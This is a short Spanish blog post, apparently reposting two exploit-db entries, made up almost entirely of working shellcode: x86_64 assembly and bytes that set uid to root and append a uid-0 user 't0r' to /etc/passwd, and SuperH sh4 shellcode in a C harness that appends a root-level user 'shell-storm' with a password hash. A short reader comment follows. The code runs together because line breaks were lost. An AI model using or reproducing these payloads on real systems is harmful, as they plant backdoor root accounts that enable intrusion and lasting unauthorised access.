Último artículo de Shellcodes, disfrutarlo! :D
http://www.exploit-db.com/exploits/18585/
Linux x86_64 - add user with passwd (189 bytes);sc_adduser01.S;Arch: x86_64, Linux;;Author: 0_o -- null_null; nu11.nu11 [at] yahoo.com;Date: 2012-03-05;;compile an executable: nasm -f elf64 sc_adduser.S; ld -o sc_adduser sc_adduser.o;compile an object: nasm -o sc_adduser_obj sc_adduser.S;;Purpose: adds user "t0r" with password "Winner" to /etc/passwd;executed syscalls: setreuid, setregid, open, write, close, exit;Result: t0r:3UgT5tXKUkUFg:0:0::/root:/bin/bash;syscall op codes: /usr/include/x86_64-linux-gnu/asm/unistd_64.hBITS 64[SECTION .text]global _start_start:;sys_setreuid(uint ruid, uint euid)xor rax, raxmov al, 113 ;syscall sys_setreuidxor rbx, rbx ;arg 1 -- set real uid to rootmov rcx, rbx ;arg 2 -- set effective uid to rootsyscall;sys_setregid(uint rgid, uint egid)xor rax, raxmov al, 114 ;syscall sys_setregidxor rbx, rbx ;arg 1 -- set real uid to rootmov rcx, rbx ;arg 2 -- set effective uid to rootsyscall;push all strings on the stack prior to file operations.xor rbx, rbxmov ebx, 0x647773FFshr rbx, 8push rbx ;string \00dwsmov rbx, 0x7361702f6374652fpush rbx ;string sap/cte/mov rbx, 0x0A687361622F6EFFshr rbx, 8push rbx ;string \00\nhsab/nmov rbx, 0x69622F3A746F6F72push rbx ;string ib/:toormov rbx, 0x2F3A3A303A303A67push rbx ;string /::0:0:gmov rbx, 0x46556B554B587435push rbx ;string FUkUKXt5mov rbx, 0x546755333A723074push rbx ;string TgU3:r0t;prelude to doing anything useful...mov rbx, rsp ;save stack pointer for later usepush rbp ;store base pointer to stack so it can be restored latermov rbp, rsp ;set base pointer to current stack pointer;sys_open(char* fname, int flags, int mode)sub rsp, 16mov [rbp - 16], rbx ;store pointer to "t0r..../bash"mov si, 0x0401 ;arg 2 -- flagsmov rdi, rbxadd rdi, 40 ;arg 1 -- pointer to "/etc/passwd"xor rax, raxmov al, 2 ;syscall sys_opensyscall;sys_write(uint fd, char* buf, uint size)mov [rbp - 4], eax ;arg 1 -- fd is retval of sys_open. save fd to stack for later use.mov rcx, rbx ;arg 2 -- load rcx with pointer to string "t0r.../bash"xor rdx, rdxmov dl, 39 ;arg 3 -- load rdx with size of string "t0r.../bash\00"mov rsi, rcx ;arg 2 -- move to source index registermov rdi, rax ;arg 1 -- move to destination index registerxor rax, raxmov al, 1 ;syscall sys_writesyscall;sys_close(uint fd)xor rdi, rdimov edi, [rbp - 4] ;arg 1 -- load stored file descriptor to destination index registerxor rax, raxmov al, 3 ;syscall sys_closesyscall;sys_exit(int err_code)xor rax, raxmov al, 60 ;syscall sys_exitxor rbx, rbx ;arg 1 -- error codesyscall;char shellcode[] =; "\x48\x31\xc0\xb0\x71\x48\x31\xdb\x48\x31\xc9\x0f\x05\x48\x31"; "\xc0\xb0\x72\x48\x31\xdb\x48\x31\xc9\x0f\x05\x48\x31\xdb\xbb"; "\xff\x73\x77\x64\x48\xc1\xeb\x08\x53\x48\xbb\x2f\x65\x74\x63"; "\x2f\x70\x61\x73\x53\x48\xbb\xff\x6e\x2f\x62\x61\x73\x68\x0a"; "\x48\xc1\xeb\x08\x53\x48\xbb\x72\x6f\x6f\x74\x3a\x2f\x62\x69"; "\x53\x48\xbb\x67\x3a\x30\x3a\x30\x3a\x3a\x2f\x53\x48\xbb\x35"; "\x74\x58\x4b\x55\x6b\x55\x46\x53\x48\xbb\x74\x30\x72\x3a\x33"; "\x55\x67\x54\x53\x48\x89\xe3\x55\x48\x89\xe5\x48\x83\xec\x10"; "\x48\x89\x5d\xf0\x66\xbe\x01\x04\x48\x89\xdf\x48\x83\xc7\x28"; "\x48\x31\xc0\xb0\x02\x0f\x05\x89\x45\xfc\x48\x89\xd9\x48\x31"; "\xd2\xb2\x27\x48\x89\xce\x48\x89\xc7\x48\x31\xc0\xb0\x01\x0f"; "\x05\x48\x31\xff\x8b\x7d\xfc\x48\x31\xc0\xb0\x03\x0f\x05\x48"; "\x31\xc0\xb0\x3c\x48\x31\xdb\x0f\x05";;;equivalent code:;;char shellcode[] =; "\x48\x31\xc0\xb0\x71\x48\x31\xdb\x48\x89\xd9\x0f\x05\x48\x31"; "\xc0\xb0\x72\x48\x31\xdb\x48\x89\xd9\x0f\x05\x48\x31\xdb\xbb"; "\xff\x73\x77\x64\x48\xc1\xeb\x08\x53\x48\xbb\x2f\x65\x74\x63"; "\x2f\x70\x61\x73\x53\x48\xbb\xff\x6e\x2f\x62\x61\x73\x68\x0a"; "\x48\xc1\xeb\x08\x53\x48\xbb\x72\x6f\x6f\x74\x3a\x2f\x62\x69"; "\x53\x48\xbb\x67\x3a\x30\x3a\x30\x3a\x3a\x2f\x53\x48\xbb\x35"; "\x74\x58\x4b\x55\x6b\x55\x46\x53\x48\xbb\x74\x30\x72\x3a\x33"; "\x55\x67\x54\x53\x48\x89\xe3\x55\x48\x89\xe5\x48\x83\xec\x10"; "\x48\x89\x5d\xf0\x66\xbe\x01\x04\x48\x89\xdf\x48\x83\xc7\x28"; "\x48\x31\xc0\xb0\x02\x0f\x05\x89\x45\xfc\x48\x89\xd9\x48\x31"; "\xd2\xb2\x27\x48\x89\xce\x48\x89\xc7\x48\x31\xc0\xb0\x01\x0f"; "\x05\x48\x31\xff\x8b\x7d\xfc\x48\x31\xc0\xb0\x03\x0f\x05\x48"; "\x31\xc0\xb0\x3c\x48\x31\xdb\x0f\x05";-------------------------------------------------------------------------------------http://www.exploit-db.com/exploits/17439/SuperH (sh4) Add root user with password/*** Title: Linux/SuperH - sh4 - add root user with password - 143 bytes** Date: 2011-06-23** Tested on: debian-sh4 2.6.32-5-sh7751r** Author: Jonathan Salwan - twitter: @jonathansalwan**** http://shell-storm.org**** Informations:** -------------** - user: shell-storm** - pswd: toor** - uid : 0**** open:** mov #5, r3** mova @(130, pc), r0** mov r0, r4** mov #255, r13** mov #4, r12** mul.l r13, r12** sts macl, r5** add #69, r5** mov #84, r13** mov #5, r12** mul.l r13, r12** sts macl, r6** trapa #2** mov r0, r11**** write:** xor r6, r6** xor r5, r5** mov #4, r3** mov r11, r4** mova @(20, pc), r0** mov r0, r5** mov #72, r6** trapa #2**** close:** mov #6, r3** mov r11, r4** trapa #2**** exit:** mov #1, r3** xor r4, r4** trapa #2** ** user:** .string "shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n"**** file:** .string "@@@/etc/passwd"****** The '@@@' is just for alignment.***/#include #include char *SC = /* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 0644) = fd */ "\x05\xe3\x20\xc7\x03\x64\xff\xed" "\x04\xec\xd7\x0c\x1a\x05\x45\x75" "\x54\xed\x05\xec\xd7\x0c\x1a\x06" "\x02\xc3" /* r11 = fd */ "\x03\x6b" /* write(fd, "shell-storm:$1$KQYl/yru$PMt02zUTW"..., 72) */ "\x6a\x26\x5a\x25\x04\xe3\xb3\x64" "\x04\xc7\x03\x65\x48\xe6\x02\xc3" /* close(fd) */ "\x06\xe3\xb3\x64\x02\xc3" /* exit(0) */ "\x01\xe3\x4a\x24\x02\xc3" /* shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n */ "\x73\x68\x65\x6c\x6c\x2d\x73\x74" "\x6f\x72\x6d\x3a\x24\x31\x24\x4b" "\x51\x59\x6c\x2f\x79\x72\x75\x24" "\x50\x4d\x74\x30\x32\x7a\x55\x54" "\x57\x6d\x4d\x76\x50\x57\x63\x55" "\x34\x6f\x51\x4c\x73\x2f\x3a\x30" "\x3a\x30\x3a\x72\x6f\x6f\x74\x3a" "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62" "\x69\x6e\x2f\x62\x61\x73\x68\x5c" "\x6e" /* @@@/etc/passwd */ "\x40\x40\x40\x2f\x65\x74\x63\x2f" "\x70\x61\x73\x73\x77\x64";int main(void){ fprintf(stdout,"Length: %d\n",strlen(SC)); (*(void(*)()) SC)();return 0;}
Esto me recuerda los "pokes" que salían en la micromania... que tiempos!!!
ResponderEliminar